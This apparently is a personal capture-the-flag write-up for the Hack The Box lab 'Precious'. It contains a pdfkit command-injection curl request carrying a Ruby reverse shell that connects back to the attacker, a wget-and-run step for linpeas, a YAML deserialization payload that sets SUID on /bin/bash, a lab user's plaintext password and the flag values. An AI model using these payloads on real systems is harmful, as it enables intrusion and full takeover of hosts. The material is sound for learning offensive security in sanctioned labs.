Precious

TARGET IP: 10.10.11.189

HOST IP: 10.10.16.10

Recon

NMAP

nmap [Target IP]

nmap -A -p 22,80 [Target IP]

HTTP

First start by adding the URL to the associated target IP Address by adding it to the hosts file.

echo "[TARGET IP] precious.htb" | sudo tee -a /etc/hosts

I tried adding a URL to see what happens but it looks like it does not have web access to view page.
It does look like it will return credentials back depending on what you put in.

Enumeration

Gobuster

gobuster dir -u http://precious.htb/ -w /usr/share/dirb/wordlists/common.txt

Exploit

It looks like none of my notes from last night got saved for some stupid fucking reason. I need to learn how to better use this fucking site or this is going to drive me fucking nuts.
Long story but I created different file extension payloads. It seems like the machine filters out .php and .rb file extensions and will make a pdf file of any other file type I load into it.
I did this by starting up a python web server on my host machine and plugging the URL into the input box on the web server and opening up a netcat listener to see if I could get something to stick.
I'm still not positive on the backend code being used but am making the assumption that it is either php or ruby.

JAVA

I started trying out java reverse shells and got something interesting when I used a java one liner with the file extension .xml.

PDF

I finally downloaded one of the pdfs that I created and opened it in exiftool to take a look at the properties.

exiftool [PDF File Path]

It looks like the Creator's name is pdfkit V0.8.6
Let's go take a look at how I can possibly exploit this.

CVE-2022-25765

Looks like this tool has a vulnerability that allows for Command Injection. Let's see if we can exploit this.
Set up a netcat listener

nc -lvnp 4444

curl '[TARGET URL]' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: [TARGET URL]' -H 'Connection: keep-alive' -H 'Referer: [TARGET URL]' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'url=http%3A%2F%2F[HOST IP]%3A[HOST PORT]%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%22[HOST IP]%22%2C[HOST PORT]%29%29%27%60'

The data being sent is a URL-encoded Ruby reverse shell that connects back to the netcat listener I have set up.
Let's get a more interactive shell to work with.

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
^Z

On host machine, reopen the terminal and ignore the echo.

stty raw -echo; fg

Let's go look for the user flag.

find / -name user.txt 2>/dev/null

Looks like the file is unreadable due to permissions. Let's see what we can do about that.
I now know we have at least 3 users on the system:
- henry
- ruby
- root
We can confirm this in the /ect/passwd file.

I tired sudo -l but needed a password to use it. I also spent some time digging around to try find some other useful information. In the end, I went ahead and uploaded linpeas and ran that to see what was available.
I used the same python web server I already had running.

wget http://[HOST IP]:8000/linpeas.sh
./linpeas.sh

I wasn't getting anywhere there so I started browsing around a bit more. in the directory /home/ruby/.bundle/config I found some juicy info.

Looks like possible credentials for henry.

henry:Q3c1AqGHtoI0aXAYFH

I'll now SSH into the machine with henry's credentials and it works.

ssh henry@[Target IP]

Now let's get that user file.

0d534cd692f6860abfeb9af4ba3c4e92

Next step is to see what priveleges I have as Henry.

sudo -l

We have sudo privileges to run the update/dependencies.rb file. If we cat that file we can see that it calls back to a dependencies.yml file.

# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end

With this information, we should be able to craft a new dependencies.yml file with malicious code that it will call back to as sudo.

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "chmod +s /bin/bash"
         method_id: :resolve

You'll notice that the git_set is set to chmod +s /bin/bash.
This sets SUID to the that file which means we should be able to exploit it and escalate out privileges.
In the same directory that you created the dependencies.yml file, run the following:

sudo /usr/bin/ruby /opt/update_dependencies.rb

This will execute file and end up changing the /bin/bash file privileges.

/bin/bash -p

Check to see who are with whoami and you should now be root.

cat /root/root.txt

7090f28f7bc0ffc0a8b3203bd45ff6ac

PreviousBlue NextOptimum

Last updated 2 years ago